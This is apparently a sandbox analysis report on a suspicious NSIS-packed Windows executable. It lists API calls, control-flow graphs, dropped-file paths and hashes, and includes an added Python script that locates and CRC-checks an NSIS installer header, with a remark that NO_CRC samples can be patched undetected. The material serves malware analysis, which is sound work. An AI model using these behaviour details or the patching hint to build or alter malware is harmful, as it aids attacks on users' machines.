                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                          • GlobalFree.KERNEL32(?), ref: 00405092
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                          • ShowWindow.USER32(?,00000000), ref: 00405231
                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                          • ShowWindow.USER32(00000000), ref: 00405243
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                          • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                          • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                          • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58

                                                          Control-flow Graph (function starting at 00405990; rendered graph with Executed / Not Executed node markings omitted)
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059B9
                                                          • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A01
                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A24
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                          • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                          • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                          Strings
                                                          • \*.*, xrefs: 004059FB
                                                          • "C:\Users\user\Desktop\450707124374000811.exe", xrefs: 00405990
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-1362236379
                                                          • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                          • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                          • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                          • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D0
                                                          • FindClose.KERNEL32(00000000), ref: 004065DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                          • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                          • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                          • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698

                                                          Control-flow Graph (function starting at 00403D3E; rendered graph with Executed / Not Executed node markings omitted)
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                          • ShowWindow.USER32(?), ref: 00403D97
                                                          • DestroyWindow.USER32 ref: 00403DAB
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                          • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                          • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                          • EnableWindow.USER32(?,?), ref: 0040401A
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                          • EnableMenuItem.USER32(00000000), ref: 00404037
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                          • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                          • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                          • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID:
                                                          • API String ID: 3282139019-0
                                                          • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                          • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                          • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                          • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D

Control-flow Graph
                                                          control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039ba call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 379 403a16-403a3f call 403c66 call 405c5b 369->379 375 4039f5-403a06 call 406150 370->375 376 403a0b-403a11 lstrcatW 370->376 375->376 376->379 384 403ad1-403ad9 call 405c5b 379->384 385 403a45-403a4a 379->385 391 403ae7-403b0c LoadImageW 384->391 392 403adb-403ae2 call 4062a4 384->392 385->384 386 403a50-403a78 call 406150 385->386 386->384 393 403a7a-403a7e 386->393 395 403b8d-403b95 call 40140b 391->395 396 403b0e-403b3e RegisterClassW 391->396 392->391 397 403a90-403a9c lstrlenW 393->397 398 403a80-403a8d call 405b80 393->398 410 403b97-403b9a 395->410 411 403b9f-403baa call 403c66 395->411 399 403b44-403b88 SystemParametersInfoW CreateWindowExW 396->399 400 403c5c 396->400 404 403ac4-403acc call 405b53 call 406282 397->404 405 403a9e-403aac lstrcmpiW 397->405 398->397 399->395 403 403c5e-403c65 400->403 404->384 405->404 409 403aae-403ab8 GetFileAttributesW 405->409 414 403aba-403abc 409->414 415 403abe-403abf call 405b9f 409->415 410->403 419 403bb0-403bca ShowWindow call 4065ec 411->419 420 403c33-403c3b call 4053b9 411->420 414->404 414->415 415->404 427 403bd6-403be8 GetClassInfoW 419->427 428 403bcc-403bd1 call 4065ec 419->428 425 403c55-403c57 call 40140b 420->425 426 403c3d-403c43 420->426 425->400 426->410 429 403c49-403c50 call 40140b 426->429 432 403c00-403c23 DialogBoxParamW call 40140b 427->432 433 403bea-403bfa GetClassInfoW RegisterClassW 427->433 428->427 429->410 437 403c28-403c31 call 4038e0 432->437 433->432 437->403
                                                          APIs
                                                            • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                            • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                          • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\450707124374000811.exe",00000000), ref: 00403A11
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                          • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                          • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                          • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
Memory Dump Source
• Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot file identical to those listed above)
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-2713776338
                                                          • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                          • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                          • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                          • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D

Control-flow Graph
                                                          control_flow_graph 440 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 443 402f11-402f16 440->443 444 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 440->444 445 4030f3-4030f7 443->445 452 403036-403044 call 402e5d 444->452 453 402f4f 444->453 459 403046-403049 452->459 460 403099-40309e 452->460 455 402f54-402f6b 453->455 457 402f6d 455->457 458 402f6f-402f78 call 403315 455->458 457->458 467 4030a0-4030a8 call 402e5d 458->467 468 402f7e-402f85 458->468 462 40304b-403063 call 40332b call 403315 459->462 463 40306d-403097 GlobalAlloc call 40332b call 4030fa 459->463 460->445 462->460 491 403065-40306b 462->491 463->460 489 4030aa-4030bb 463->489 467->460 469 403001-403005 468->469 470 402f87-402f9b call 405d2f 468->470 477 403007-40300e call 402e5d 469->477 478 40300f-403015 469->478 470->478 487 402f9d-402fa4 470->487 477->478 480 403024-40302e 478->480 481 403017-403021 call 40674f 478->481 480->455 488 403034 480->488 481->480 487->478 493 402fa6-402fad 487->493 488->452 494 4030c3-4030c8 489->494 495 4030bd 489->495 491->460 491->463 493->478 496 402faf-402fb6 493->496 497 4030c9-4030cf 494->497 495->494 496->478 498 402fb8-402fbf 496->498 497->497 499 4030d1-4030ec SetFilePointer call 405d2f 497->499 498->478 500 402fc1-402fe1 498->500 503 4030f1 499->503 500->460 502 402fe7-402feb 500->502 504 402ff3-402ffb 502->504 505 402fed-402ff1 502->505 503->445 504->478 506 402ffd-402fff 504->506 505->488 505->504 506->478
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402ED2
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\450707124374000811.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                            • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                            • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
Memory Dump Source
• Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot file identical to those listed above)
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                          • API String ID: 4283519449-639599842
                                                          • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                          • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                          • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                          • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
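The function at 402ec1 is the NSIS stub's scan of its own image for the installer "firstheader": GetModuleFileNameW, CreateFileW and GetFileSize on the running executable, then a read loop that looks for the 0xDEADBEEF signature and the "Null", "soft", "Inst" words that show up in the String ID list, and falls through to the "Installer integrity check has failed" message when the trailing CRC does not match. The Python below is an added example, not part of the Joe Sandbox report or the sample's code, that reproduces that scan and the CRC verdict on a constructed file. The header layout and flag bits follow NSIS's fileform.h; the 512-byte scan step, the "block must fit in the remaining file" bound, the header_len value of 40, the stub padding and the payload bytes are my reconstruction and are assumptions for the demonstration. The CRC is zlib's standard CRC-32, which is what the stub computes over everything except the stored 4-byte trailer.

```python
"""Locate and validate an NSIS firstheader the way the installer stub does (added example)."""
import struct
import zlib

# Constants from NSIS fileform.h: signature word and the three words that read
# "Null", "soft", "Inst" when stored as little-endian 32-bit integers.
FH_SIG = 0xDEADBEEF
FH_INT1, FH_INT2, FH_INT3 = 0x6C6C754E, 0x74666F73, 0x74736E49
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8
FH_FLAGS_MASK = 0x0F
# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FIRSTHEADER = struct.Struct("<IIIIIII")
SCAN_STEP = 512  # assumption: the stub reads its image in 512-byte steps until the header is found


def decode_flags(flags):
    """Names of the set FH_FLAGS_* bits, in bit order."""
    names = []
    for bit, name in ((FH_FLAGS_UNINSTALL, "UNINSTALL"), (FH_FLAGS_SILENT, "SILENT"),
                      (FH_FLAGS_NO_CRC, "NO_CRC"), (FH_FLAGS_FORCE_CRC, "FORCE_CRC")):
        if flags & bit:
            names.append(name)
    return names


def find_firstheader(data):
    """Return the first 512-aligned firstheader that passes the stub's checks, or None."""
    total = len(data)
    for pos in range(0, total - FIRSTHEADER.size + 1, SCAN_STEP):
        flags, sig, n1, n2, n3, hdr_len, data_len = FIRSTHEADER.unpack_from(data, pos)
        if sig != FH_SIG or (n1, n2, n3) != (FH_INT1, FH_INT2, FH_INT3):
            continue
        if flags & ~FH_FLAGS_MASK:                   # reserved flag bits must be clear
            continue
        if data_len == 0 or data_len > total - pos:  # block cannot run past end of file
            continue
        return {
            "offset": pos,
            "flags": flags,
            "flag_names": decode_flags(flags),
            "header_len": hdr_len,
            "data_len": data_len,
            "datablock_offset": pos + FIRSTHEADER.size,  # where the compressed header block starts
        }
    return None


def crc_required(flags, ncrc_switch=False):
    """CRCCheck off sets NO_CRC; CRCCheck force sets FORCE_CRC, which overrides a /NCRC switch."""
    if flags & FH_FLAGS_NO_CRC:
        return False
    if flags & FH_FLAGS_FORCE_CRC:
        return True
    return not ncrc_switch


def verify_crc(data):
    """Stub semantics: CRC-32 over the whole file except the trailing 4-byte stored CRC."""
    if len(data) < 4:
        return False
    stored = struct.unpack_from("<I", data, len(data) - 4)[0]
    return stored == (zlib.crc32(data[:-4]) & 0xFFFFFFFF)


def build_sample(flags=0, stub_size=1024, payload=b"\x00" * 64, header_len=40):
    """Constructed test image: fake PE stub padding, firstheader, payload, trailing CRC.
    header_len and the payload are placeholders, not taken from any real installer."""
    data_len = FIRSTHEADER.size + len(payload) + 4   # counts header, data and the CRC itself
    fh = FIRSTHEADER.pack(flags, FH_SIG, FH_INT1, FH_INT2, FH_INT3, header_len, data_len)
    image = b"MZ" + b"\x90" * (stub_size - 2) + fh + payload
    return image + struct.pack("<I", zlib.crc32(image) & 0xFFFFFFFF)


def triage(data, ncrc_switch=False):
    """Header details plus the integrity verdict the stub would reach on this image."""
    info = find_firstheader(data)
    if info is None:
        return {"verdict": "not an NSIS image"}
    if crc_required(info["flags"], ncrc_switch) and not verify_crc(data):
        info["verdict"] = "Installer integrity check has failed"
    else:
        info["verdict"] = "ok"
    return info


if __name__ == "__main__":
    sample = build_sample(flags=FH_FLAGS_SILENT)
    print(triage(sample))
    broken = bytearray(sample)
    broken[1100] ^= 0xFF        # corrupt one payload byte: CRC mismatch
    print(triage(bytes(broken)))
```

Running triage() against a real NSIS-wrapped sample gives the offset of the firstheader and of the data block that follows it, which is the starting point for carving the compressed script and plugin DLLs (the System.dll dropped to %TEMP% in the next function record comes from that block). A NO_CRC flag also tells you that a sample can be patched without tripping the integrity check the stub displays.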

Control-flow Graph
                                                          control_flow_graph 507 4062a4-4062af 508 4062b1-4062c0 507->508 509 4062c2-4062d8 507->509 508->509 510 4064f0-4064f6 509->510 511 4062de-4062eb 509->511 512 4064fc-406507 510->512 513 4062fd-40630a 510->513 511->510 514 4062f1-4062f8 511->514 515 406512-406513 512->515 516 406509-40650d call 406282 512->516 513->512 517 406310-40631c 513->517 514->510 516->515 518 406322-406360 517->518 519 4064dd 517->519 521 406480-406484 518->521 522 406366-406371 518->522 523 4064eb-4064ee 519->523 524 4064df-4064e9 519->524 527 406486-40648c 521->527 528 4064b7-4064bb 521->528 525 406373-406378 522->525 526 40638a 522->526 523->510 524->510 525->526 529 40637a-40637d 525->529 532 406391-406398 526->532 530 40649c-4064a8 call 406282 527->530 531 40648e-40649a call 4061c9 527->531 533 4064ca-4064db lstrlenW 528->533 534 4064bd-4064c5 call 4062a4 528->534 529->526 535 40637f-406382 529->535 545 4064ad-4064b3 530->545 531->545 537 40639a-40639c 532->537 538 40639d-40639f 532->538 533->510 534->533 535->526 541 406384-406388 535->541 537->538 543 4063a1-4063bf call 406150 538->543 544 4063da-4063dd 538->544 541->532 553 4063c4-4063c8 543->553 546 4063ed-4063f0 544->546 547 4063df-4063eb GetSystemDirectoryW 544->547 545->533 549 4064b5 545->549 551 4063f2-406400 GetWindowsDirectoryW 546->551 552 40645b-40645d 546->552 550 40645f-406463 547->550 554 406478-40647e call 406516 549->554 550->554 559 406465 550->559 551->552 552->550 556 406402-40640c 552->556 557 406468-40646b 553->557 558 4063ce-4063d5 call 4062a4 553->558 554->533 562 406426-40643c SHGetSpecialFolderLocation 556->562 563 40640e-406411 556->563 557->554 560 40646d-406473 lstrcatW 557->560 558->550 559->557 560->554 566 406457 562->566 567 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 562->567 563->562 565 406413-40641a 563->565 569 406422-406424 565->569 566->552 567->550 567->566 569->550 569->562
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                          • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                          • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                          • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                          • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
Memory Dump Source
• Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps and IDA snapshot file identical to those listed above)
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1230650788
                                                          • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                          • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                          • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                          • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D

Control-flow Graph
                                                          control_flow_graph 634 40176f-401794 call 402c37 call 405bca 639 401796-40179c call 406282 634->639 640 40179e-4017b0 call 406282 call 405b53 lstrcatW 634->640 645 4017b5-4017b6 call 406516 639->645 640->645 649 4017bb-4017bf 645->649 650 4017c1-4017cb call 4065c5 649->650 651 4017f2-4017f5 649->651 658 4017dd-4017ef 650->658 659 4017cd-4017db CompareFileTime 650->659 653 4017f7-4017f8 call 405d4f 651->653 654 4017fd-401819 call 405d74 651->654 653->654 661 40181b-40181e 654->661 662 40188d-4018b6 call 4052e6 call 4030fa 654->662 658->651 659->658 663 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 661->663 664 40186f-401879 call 4052e6 661->664 676 4018b8-4018bc 662->676 677 4018be-4018ca SetFileTime 662->677 663->649 697 401864-401865 663->697 674 401882-401888 664->674 678 402ac8 674->678 676->677 680 4018d0-4018db CloseHandle 676->680 677->680 682 402aca-402ace 678->682 683 4018e1-4018e4 680->683 684 402abf-402ac2 680->684 686 4018e6-4018f7 call 4062a4 lstrcatW 683->686 687 4018f9-4018fc call 4062a4 683->687 684->678 691 401901-4022f6 call 4058e4 686->691 687->691 691->682 697->674 699 401867-401868 697->699 699->664
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
